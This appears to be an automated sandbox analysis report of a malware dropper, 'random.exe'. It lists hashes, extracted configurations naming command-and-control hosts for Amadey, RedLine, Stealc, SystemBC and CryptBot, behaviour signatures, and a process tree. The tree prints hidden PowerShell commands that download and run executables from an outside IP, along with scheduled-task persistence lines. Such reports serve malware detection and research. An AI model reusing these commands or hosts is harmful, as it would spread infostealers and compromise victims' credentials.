Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-02-2025 23:17

General

  • Target

    random.exe

  • Size

    2.1MB

  • MD5

    57dbb3339312da8b04a3e067ca47dcae

  • SHA1

    2a5c573173a5b8b770a955ade295720e6d634cbb

  • SHA256

    4baf8a7e88b5ef57ea5ac4db9a9b3ed867170305bf0ddf59f7f87b8d823cfe14

  • SHA512

    340ec0e6bfef7e04b11ffa13c838aac83933d6a75869a4c7c41b188df1a501d621c607f40b75aa3516c4a662e0e4c575f5b15cb138721b7cf47e73e7051d50d4

  • SSDEEP

    49152:vIkSVA3kJEuWX8Xzeiqhx+mpiME+a6Xty0afl:vIky7JEuWX8XyiQJfOfl

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

cryptbot

C2

http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk17

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 23 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 38 IoCs
  • Uses browser remote debugging 2 TTPs 17 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 46 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 23 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 35 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 12 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 14 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3628
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1152
      • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
        "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4312
        • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
          "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
          4⤵
          • Executes dropped EXE
          PID:4212
        • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
          "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
          4⤵
          • Executes dropped EXE
          PID:4848
        • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
          "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
          4⤵
          • Executes dropped EXE
          PID:3236
        • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
          "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
          4⤵
          • Executes dropped EXE
          PID:3696
        • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
          "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1528
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 832
          4⤵
          • Program crash
          PID:2364
      • C:\Users\Admin\AppData\Local\Temp\1088140001\oKUl4yo.exe
        "C:\Users\Admin\AppData\Local\Temp\1088140001\oKUl4yo.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2324
      • C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe
        "C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4724
      • C:\Users\Admin\AppData\Local\Temp\1088255101\7522e4c07b.exe
        "C:\Users\Admin\AppData\Local\Temp\1088255101\7522e4c07b.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn TegdbmaDHSh /tr "mshta C:\Users\Admin\AppData\Local\Temp\6YWWkm6aD.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1424
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn TegdbmaDHSh /tr "mshta C:\Users\Admin\AppData\Local\Temp\6YWWkm6aD.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4888
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\6YWWkm6aD.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:60
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3468
            • C:\Users\Admin\AppData\Local\TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE
              "C:\Users\Admin\AppData\Local\TempGOUGR4TGD6JCCDKYGOV3HERW3GKMQMUI.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5104
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1088256021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3908
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1088256021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1296
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2744
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2036
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3136
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2240
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3284
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
              PID:4292
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1248
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "pGQUgmadLV7" /tr "mshta \"C:\Temp\1xCtVa62r.hta\"" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:4476
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\1xCtVa62r.hta"
              5⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:4684
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3296
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4280
        • C:\Users\Admin\AppData\Local\Temp\1088305001\amnew.exe
          "C:\Users\Admin\AppData\Local\Temp\1088305001\amnew.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Windows directory
          PID:3608
          • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
            "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
            4⤵
            • Downloads MZ/PE file
            • Checks computer location settings
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:3656
            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
              5⤵
              • Executes dropped EXE
              PID:5076
              • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:4888
            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1428
              • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4364
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 828
                6⤵
                • Program crash
                PID:4460
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4596
              • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                6⤵
                • Executes dropped EXE
                PID:4704
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 956
                6⤵
                • Program crash
                PID:2500
            • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
              "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
              5⤵
              • Executes dropped EXE
              PID:4788
            • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
              "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:4340
              • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3620
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 968
                6⤵
                • Program crash
                PID:980
            • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
              "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:4408
              • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                6⤵
                • Executes dropped EXE
                PID:2608
              • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                6⤵
                • Executes dropped EXE
                PID:1528
              • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                6⤵
                • Executes dropped EXE
                PID:4456
              • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                6⤵
                • Executes dropped EXE
                PID:4812
              • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
                "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4008
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 820
                6⤵
                • Program crash
                PID:3856
            • C:\Users\Admin\AppData\Local\Temp\10008930101\e4519c4ed8.exe
              "C:\Users\Admin\AppData\Local\Temp\10008930101\e4519c4ed8.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:5220
            • C:\Users\Admin\AppData\Local\Temp\10008940101\3f44de5325.exe
              "C:\Users\Admin\AppData\Local\Temp\10008940101\3f44de5325.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:5748
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                6⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:5136
        • C:\Users\Admin\AppData\Local\Temp\1088323001\0f68b49190.exe
          "C:\Users\Admin\AppData\Local\Temp\1088323001\0f68b49190.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5008
        • C:\Users\Admin\AppData\Local\Temp\1088324001\4ddd11db3b.exe
          "C:\Users\Admin\AppData\Local\Temp\1088324001\4ddd11db3b.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1360
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 1512
            4⤵
            • Program crash
            PID:3668
        • C:\Users\Admin\AppData\Local\Temp\1088325001\8ca656b8af.exe
          "C:\Users\Admin\AppData\Local\Temp\1088325001\8ca656b8af.exe"
          3⤵
          • Enumerates VirtualBox registry keys
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:3476
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
            4⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            PID:1420
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd28a5cc40,0x7ffd28a5cc4c,0x7ffd28a5cc58
              5⤵
                PID:5860
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2012,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:2
                5⤵
                  PID:4060
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2252 /prefetch:3
                  5⤵
                    PID:1380
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2504 /prefetch:8
                    5⤵
                      PID:5596
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3184 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:4808
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3228 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:1072
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4524 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:5992
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4628 /prefetch:8
                      5⤵
                        PID:5248
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,8045598026030950065,6813765965052985045,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
                        5⤵
                          PID:5640
                      • C:\Users\Admin\AppData\Local\Temp\service123.exe
                        "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:2292
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                        4⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:5232
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1516
                        4⤵
                        • Program crash
                        PID:5436
                    • C:\Users\Admin\AppData\Local\Temp\1088326001\05bc0d252e.exe
                      "C:\Users\Admin\AppData\Local\Temp\1088326001\05bc0d252e.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2396
                    • C:\Users\Admin\AppData\Local\Temp\1088327001\c550466aee.exe
                      "C:\Users\Admin\AppData\Local\Temp\1088327001\c550466aee.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5064
